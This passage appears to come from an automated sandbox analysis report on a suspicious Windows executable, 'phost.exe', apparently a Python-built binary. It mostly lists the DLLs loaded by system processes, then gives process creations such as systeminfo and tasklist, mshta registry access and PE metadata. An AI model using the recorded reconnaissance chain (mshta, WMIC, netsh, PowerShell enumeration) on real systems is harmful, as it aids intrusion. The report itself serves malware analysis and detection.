              Source: C:\Windows\System32\svchost.exe  Section loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: mi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: webio.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: es.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edputil.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: version.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exe  Section loaded: profapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\tree.com  Section loaded: ulib.dll
              Source: C:\Windows\System32\tree.com  Section loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: onex.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exe  Section loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
              Source: C:\Windows\System32\mshta.exe | Automated click: OK
              Source: C:\Windows\System32\conhost.exe | Automated click: OK
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: phost.exe | Static PE information: Image base 0x140000000 > 0x60000000
              Source: phost.exe | Static file information: File size 7832204 > 1048576
              Source: phost.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: phost.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: phost.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: phost.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: phost.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: phost.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: phost.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: phost.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: phost.exe, 00000001.00000002.2186287138.00007FFE13301000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: phost.exe, 00000001.00000002.2183769002.00007FFDFB5E4000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jnxiphgt\jnxiphgt.pdb source: powershell.exe, 0000004A.00000002.1977970654.000001C716F45000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: phost.exe, 00000001.00000002.2181473633.00007FFDFAA4F000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: phost.exe, 00000001.00000002.2185911655.00007FFE126D1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: phost.exe, 00000001.00000002.2186466073.00007FFE13337000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: phost.exe, 00000001.00000002.2182012279.00007FFDFAAE5000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: phost.exe, phost.exe, 00000001.00000002.2182736521.00007FFDFB052000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: t.pdb source: powershell.exe, 0000004A.00000002.2038143526.000001C72DD50000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: phost.exe, 00000001.00000002.2186119387.00007FFE130C1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: phost.exe, 00000001.00000002.2185661990.00007FFE1151C000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: phost.exe, 00000001.00000002.2185499865.00007FFE10301000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: phost.exe, 00000000.00000003.1675759091.000001C32AC81000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2187104659.00007FFE1A461000.00000002.00000001.01000000.00000005.sdmp
